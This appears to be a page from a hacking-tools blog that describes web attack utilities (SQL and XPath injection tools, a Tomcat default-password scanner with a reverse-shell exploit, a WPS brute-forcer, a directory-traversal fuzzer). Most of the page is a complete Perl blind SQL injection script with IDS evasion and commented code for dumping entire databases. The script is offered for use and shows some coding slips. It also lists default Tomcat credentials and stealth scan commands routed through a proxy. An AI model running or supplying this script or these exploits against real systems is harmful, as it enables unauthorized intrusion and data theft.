IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Learn more about it here | Download from here
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
Eg: Passwords sent over clear-text, Http-Only /Secure flag missing in cookies
Active Plug-ins
- Performs scans against the target to
- identify vulnerabilities
- Executed only when the user explicitly
- calls them
- Fine-grained scanning support
Eg: Cross-site Scripting, SQL Injection
IronWASP performs Taint Analysis forDOM based XSS, identifies Sources and Sinks and traces them through the code. Also custom Source and Sink objects can be configured.
web-sorrow – server security scanner
A perl based tool for misconfiguration, version detection, enumeration, and server information scanning. Web-Sorrow is a "safe to run" program. meaning it is not designed attempt to exploit or preform any kind of injection, DDoS/DoS, CSRF, XSS, or any harmful attacks. It's entirely focused on Enumeration and collecting Info on the target server.
CURRENT functionality:
-S - stands for standard. a set of Standard tests and includes: indexing of directories testing, banner grabbing, language detection (should be obvious), robots.txt, 200 response testing (some servers send a 200 ok for every req), and thumbs.db scanning
-auth - looks for login pages with a list of some of the most common login files and dirs and admin consoles. don't need to be very big list of URLs because what else are going to name it? notAlogin.php???
-Cp - scan with a huge list of plugins dirs. the list is a bit old (Drupal and wordpress plugins databases are now current but sorry joomla's still a bit old)
-I - searches the responses for interesting strings
-Ws - looks for web services such as hosting provider, blogging services, favicon fingerprinting, and cms version info
-Fd - look for generally things people don't want you to see. The list is generated form a TON of robot.txt so whatever it finds should be interesting.
-ninja - A light weight and undetectable scan that uses bits and peaces from other scans
-R - use http range headers to make scans faster
-Shadow - Use Google cache instead of requesting from the target host
-Sd - Bruteforce Sub Domains
-Db - Bruteforce Directories with the big dirbuster Database
-ua - use a custom UserAgent. PUT UA IN QUOTES if there's spaces
-proxy - send all http reqs via a proxy. example: 255.255.255.254:8080
-e - run all the scans in the tool
web-sorrow also has false positives checking on most of it's requests (it pretty accurate but not perfect)
EXAMPLES:
- basic: perl Wsorrow.pl -host scanme.nmap.org -S
- stealthy: perl Wsorrow.pl -host scanme.nmap.org -ninja -proxy 190.145.74.10:3128
- scan for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth
- CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I
- most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e
- dump http headers: perl headerDump.pl
- Check if host is alive: perl hdt.pl -host 192.168.1.1
CONTACT: @flyinpoptartcat
Enema – tool for SQL injection
Enema is not autohacking software. This is dynamic tool for people, who knows what to do.
Not supported old database versions (e. g. mysql 4.x). Development targeted to modern versions.
- Features:
- Multi-platform.
- User-friendly graphical interface.
- Multithreaded.
- Dump.
- Customise your queries
- Plugins to automate attacks
- Supported for today:
- POST, GET, Cookies
- MSSQL >=2000 and MySQL>=5.0
- Injection methods supported for today:
- Error based injection.
- Union based injection (using subquery).
- Blind Time-based MSSQL(waitfor), MySQL(sleep)
Enema is not autohacking software. This is dynamic tool for people, who knows what to do. Not supported old database versions (e. g. mysql 4.x). Development targeted to modern versions.
Download here
XCat – exploitation of XPath injection vulnerabilities
XCat is a command line program that aides in the exploitation of XPath injection vulnerabilities. It boasts a wide range of features and can utilize the more advanced features of the XPath 2.0 specification (pattern matching, unicode normilization and even http requests) or gracefully degrade to using XPath 1.0 if they are not available.
XCat is built to exploit boolean XPath injections (Where only one bit of data can be extracted in one request) and it requires you to manually identifiy the exploit first, this does not do that for you.
Features
- Exploits both GET and POST attacks
- Extracts all nodes, comments, attributes and data from the entire XML document
- Small and lightweight (only dependency is Twisted)
- Parallel requests
- XPath 2.0 supported (with graceful degrading to 1.0)
- Regex pattern matching to reduce character search space
- Unicode normalization
- Advanced data postback through HTTP (see below)
- Arbitrarily read XML files on the servers file system via the doc() function (see below)
Source here
usage: xcat.py [-h] [--method {GET,POST}] [--arg POST_ARGUMENT] [[--true TRUE_KEYWORD | --false FALSE_KEYWORD | --error ERROR_KEYWORD] [--true-code TRUE_CODE | --false-code FAIL_CODE | --error-code ERROR_CODE] [--schema-only] [--quotecharacter QUOTE_CHARACTER] [--executequery EXECUTEQUERY] [--max_search SEARCH_LIMIT] [--timeout TIMEOUT] [--stepsize STEP_SIZE] [--normalize {NFD,NFC,NFDK,NFKC}] [--xversion {1,2,auto}] [--lowercase] [--regex] [--connectback] [--connectbackip CONNECTBACK_IP] [--connectbackport CONNECTBACK_PORT] [--notfoundstring NOTFOUNDCHAR] [--fileshell] [--getcwd] [--useragent USER_AGENT] [--timeit] URL
Apache Tomcat Remote Exploit (PUT request) and Account Scanner
The modified pnscan scanner utility scans a range of IPs to find open apache tomcat servers by trying the following login access combinations:
- tomcat:tomcat
- password:password
- admin:admin
- admin:password
- admin:<nopass>
- tomcat:<nopass>
The included perl script can be used to unlock apache tomcat servers remotely by using the collected login combinations.
it will retrieve either a root or SYSTEM reverse shell depending on the operating system or the equivalent of a reverse shell as the current user tomcat is running as. the exploit might contain metasploit logic (thanks to jduck).
By Kingcope
Use this tool at your own risk. No source code review (may contain hidden shell)
httpry packet sniffer
httpry is packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications.
What can you do with it? Here's a few ideas:
- See what users on your network are requesting online
- Check for proper server configuration (or improper, as the case may be)
- Research patterns in HTTP usage
- Watch for dangerous downloaded files
- Verify the enforcement of HTTP policy on your network
- Extract HTTP statistics out of saved capture files
This release brings substantial improvements to some existing features. IPv6 parsing can now follow extension headers that are present in the captured packets. Also, the rate statistics code has been substantially overhauled to handle an arbitrary number of hosts, along with a couple of additional switches for controlling behavior. Additionally, this release adds an optional switch to specify the PID filename, which is helpful when running multiple instances of httpry on the same box.
DotDotPwn v3.0 The Directory Traversal Fuzzer
Version: DotDotPwn v3.0
Release date: 03/Feb/2012 (Release at BugCon Security Conferences 2012)
Changes / Enhancements / Features:
- -X switch that implements the Bisection Algorithm in order to detect the exact deepness once a directory traversal vulnerability has been found. - http://en.wikipedia.org/wiki/Bisection_method
- -M switch to specify another method different from the default (GET) when the http module is used.
- Other HTTP methods are [POST | HEAD | COPY | MOVE]
- -e switch to specify the file extension to be appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
- New dots & slashes encodings (fuzz patterns) based on: https://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode and http://wikisecure.net/security/uri-encoding-to-bypass-idsips
Supported modules:
- HTTP
- HTTP URL
- FTP
- TFTP
- Payload (Protocol independent)
- STDOUT
Feel free to download this new release from the following sites:
Contact us: dotdotpwn@sectester.net
Reaver – brute force Wifi Protected Setup
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
MySql 5 Enumeration tool
This script uses blind SQL injection and boolean enumeration to perform INFORMATION_SCHEMA Mapping.
Usage:
perl mysql5enum.pl -h [hostname] -u [url] [-q [query]]
Ex:
perl mysql5enum.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q "select system_user()"
* By default, this script will first determine username, version and database name before enumerating the information_schema information.
* When the -q flag is applied, a user can supply any query that returns only a single cell
* If the exploit or vulnerability requires a single quote, simply tack %27 to the end of the URI.
* This script contains error detection : It will only work on a mysql 5.x database, and knows when its queries have syntax errors.
* This script uses perl's LibWhisker2 for IDS Evasion (The same as Nikto).
* This script uses the MD5 algorithm for optimization. There are other optimization methods, and this may not work on all sites.
#!/usr/bin/perl
use strict;
use Getopt::Std;
use Digest::MD5 qw(md5_hex);
use LW2;
my %options = ();
getopts("u:h:q:", \%options);
my $url = $options{u}; # Vuln URL
my $host = $options{h}; # Needs this for libwhisker
# Format.
my $count = 0;
if (my $q = $opts{q}) {
$q =~ s/\ /%20/g;
my ($cxr, $result) = runQuery($url,$host,$q);
print "Query Result:\n\t$result\nCalculated in $cxr requests.\n";
exit(1);
}
# Get the Database Version
my $query = "SELECT%20VERSION()";
my ($tmp, $version) = runQuery($url, $host, $query);
$count += $tmp;
$count += 2;
print "\nDatabase Version:\t\t$version\nIn $count requests.\n\n";
# Get the Database Name
$query = "SELECT%20DATABASE()";
my ($tmp,$answer) = runQuery($url, $host, $query);
print "Database Name:\t\t$answer\nIn $tmp requests.\n\n";
# Get the Database Username
$query = "SELECT%20USER()";
my ($tmp,$answer) = runQuery($url, $host, $query);
print "Database User:\t\t$answer\nIn $tmp requests.\n\n";
if ($version =~ /5\./g)
{
print "Enumerating Database Spec:\n";
getSchema($url,$host);
exit(1);
} else {
print "This is not MySQL v5.x, so I can't enumerate the schema tables!\n";
exit(1);
}
sub getSchema
{
my $url = shift;
my $host = shift;
my $query = "SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE())";
$query =~ s/ /%20/g;
my ($c, $val) = runQuery($url,$host,$query);
# $val = number of table names in the current database.
for (my $i=0; $i < int($val); ++$i)
{
$query = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE()) LIMIT $i,1";
$query =~ s/ /%20/g;
my ($q, $table) = runQuery($url,$host,$query);
print "$table:\n";
# $table = table name
$query = "SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=";
$query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=";
$query .= "(SELECT DATABASE()) LIMIT $i,1)";
$query =~ s/ /%20/g;
my ($r, $fcount) = runQuery($url,$host,$query);
# $fcount - number of columns in the table
for (my $n = 0; $n < int($fcount); ++$n)
{
$query = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=";
$query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=";
$query .= "(SELECT DATABASE()) LIMIT $i,1) LIMIT $n,1";
$query =~ s/ /%20/g;
my ($o, $field) = runQuery($url,$host,$query);
print "\t$field\n";
# Uncomment the lines below to
# scrape the entire database.
# $query = "SELECT COUNT($field) FROM $table";
# $query =~ s/ /%20/g;
# my ($r, $total) = runQuery($url,$host,$query);
# for (my $cn = 0; $cn < $total; $cn++)
# {
# $query = "SELECT $field FROM $table LIMIT $cn,1";
# $query =~ s/ /%20/g;
# my ($e, $data) = runQuery($url,$host,$query);
# print "\t\t$data\n";
# }
}
}
}
sub runQuery
{
my $url = shift;
my $host = shift;
my $query = shift;
my $qCount;
my $qCH;
my $pos = 1;
my $floor = 0; # Bottom of ascii keyrange
my $ceiling = 255; # Top of ascii keyrange
my $spacer = "%20OR%20";
my $truth = "62=62/*";
my $lie = "88=98/*";
my ($true, $false) = makeTrueFalse($url, $spacer, $truth, $lie, $host);
my $lenUri = "$url" . queryConstruct(0, 0, $spacer, $query);
my ($qCH, $len) = getValue($lenUri, 64, 0, $true, $false, $host);
$qCount += $qCH;
my $results = "";
while (($pos < $len) || ($pos eq $len))
{
my $uri = "$url" . queryConstruct(1, $pos, $spacer, $query); #construct the actual URI
my ($qCH, $value) = getValue($uri, $ceiling, $floor, $true, $false, $host);
$qCount += $qCH;
my $char = chr("$value");
$results .= $char;
++$pos;
}
return ($qCount, $results);
}
#Logrithm
sub getValue
{
my $uri = shift;
my $ceiling = shift;
my $floor = shift;
my $true = shift;
my $false = shift;
my $host = shift;
my $nextmaybe;
my $target;
my $qCount = 0;
my $maybe = int($ceiling/2); # Get the middle of the total possible range of values
while (not defined $target) {
if (isGT($uri, $maybe, $host) eq $true)
{
++$qCount;
$floor = $maybe;
$nextmaybe = int($maybe + (($ceiling - $floor)/2));
} elsif (isLT($uri, $maybe, $host) eq $true)
{
++$qCount;
$ceiling = $maybe;
$nextmaybe = int($maybe - (($ceiling - $floor)/2));
} elsif (isEQ($uri, $maybe, $host) eq $true)
{
++$qCount;
$target = $maybe;
return ($qCount, $target);
}
$maybe = $nextmaybe;
if (($maybe eq "") || (!$maybe) || (not defined $maybe))
{
print "SQL Error caught! Aborting!\n";
print "At least 3 queries in error log!\n";
exit(1);
}
}
}
# Is greater than?
sub isGT
{
my $uri = shift;
my $guess = shift;
my $host = shift;
return (md5_hex(download("$uri>$guess)/*", $host)));
}
# Is less than?
sub isLT
{
my $uri = shift;
my $guess = shift;
my $host = shift;
return (md5_hex(download("$uri<$guess)/*", $host)));
}
# Is equal to?
sub isEQ
{
my $uri = shift;
my $guess = shift;
my $host = shift;
return (md5_hex(download("$uri=$guess)/*", $host)));
}
# Ripped off from an older version of the scanner
sub download
{
my $uri = shift;
my $try = 5;
my $host = shift;
my %request;
my %response;
LW2::http_init_request(\%request);
$request{'whisker'}->{'method'} = "GET";
$request{'whisker'}->{'host'} = $host;
$request{'whisker'}->{'uri'} = $uri;
$request{'whisker'}->{'encode_anti_ids'} = 962;
$request{'whisker'}->{'user-agent'} = "wget";
LW2::http_fixup_request(\%request);
if(LW2::http_do_request(\%request, \%response)) {
if($try < 5) {
print "Failed to fetch $uri on try $try. Retrying...\n";
return undef if(!download($uri, $try++));
}
print "Failed to fetch $uri.\n";
return undef;
} else {
return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
}
}
sub queryConstruct
{
my $type = shift;
my $pos = shift;
my $spacer = shift;
my $query = shift;
if ($type eq 0) # Len
{
my $newQuery = "LENGTH(($query))";
my $padding = "(";
my $ender = "";
return ("$spacer$padding$newQuery$ender");
} elsif ($type eq 1) # String
{
my $padding = "((ASCII((LOWER((MID(("; # Begin query construct
my $ender = "),$pos,1))))))"; # End query Construct
return ("$spacer$padding$query$ender"); #construct the actual query
}
}
sub makeTrueFalse
{
my $url = shift;
my $spacer = shift;
my $truth = shift;
my $lie = shift;
my $host = shift;
my $trueMD = md5_hex(download("$url$spacer$truth", $host));
my $falsMD = md5_hex(download("$url$spacer$lie", $host));
# returns true, false
return ($trueMD, $falsMD);
}
soruce here
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
